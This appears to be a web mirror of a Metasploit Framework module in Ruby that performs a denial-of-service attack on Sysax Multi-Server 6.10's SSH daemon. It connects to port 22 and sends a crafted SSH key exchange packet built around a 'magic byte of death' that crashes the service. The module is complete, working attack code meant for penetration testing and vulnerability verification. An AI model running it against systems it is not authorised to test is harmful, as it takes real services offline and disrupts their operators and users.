Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service',

15
        'Description' => %q{

16
          This module sends a specially-crafted SSH Key Exchange causing the service to

17
          crash.

18
        },

19
        'Author' => 'Matt "hostess" Andreko <mandreko[at]accuvant.com>',

20
        'License' => MSF_LICENSE,

21
        'References' => [

22
          [ 'OSVDB', '92081'],

23
          [ 'URL', 'https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html']

24
        ],

25
        'DisclosureDate' => '2013-03-17',

26
        'Notes' => {

27
          'Stability' => [CRASH_SERVICE_DOWN],

28
          'SideEffects' => [],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33


34
    register_options(

35
      [

36
        Opt::RPORT(22),

37
        OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'Debian-5ubuntu1'])

38
      ]

39
    )

40
  end

41


42
  def get_packet

43
    delimiter = "\x00" * 3

44
    packet = [

45
      0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,

46
      0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,

47
      0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,

48
      0x00, 0x7e

49
    ].pack('C*')

50
    packet << Rex::Text.rand_text_alphanumeric(126)

51
    packet << delimiter

52
    packet << Rex::Text.rand_text_alphanumeric(16)

53
    packet << delimiter

54
    packet << Rex::Text.rand_text_alphanumeric(158)

55
    packet << delimiter

56
    packet << Rex::Text.rand_text_alphanumeric(158)

57
    packet << delimiter

58
    packet << Rex::Text.rand_text_alphanumeric(106)

59
    packet << delimiter

60
    packet << Rex::Text.rand_text_alphanumeric(106)

61
    packet << delimiter

62
    packet << "\x28" # Magic byte of death - seems to work with just about

63
    # anything except \x1a, the value it's supposed to be

64
    packet << Rex::Text.rand_text_alphanumeric(26)

65
    packet << delimiter

66
    packet << Rex::Text.rand_text_alphanumeric(27)

67
    packet << delimiter * 7

68
  end

69


70
  def run

71
    connect

72


73
    banner = sock.get_once || ''

74
    print_status("Banner: #{banner.strip}")

75
    sock.put('SSH-2.0-OpenSSH_5.1p1 ' + datastore['CLIENTVERSION'] + "\r\n" + get_packet)

76


77
    # Sometimes the socket closes faster than it can read, sometimes it doesn't, so catch the error just in case.

78
    begin

79
      sock.get_once

80
    rescue Errno::ECONNRESET => e

81
      vprint_error(e.message)

82
    end

83


84
    disconnect

85
  end

86
end

87


88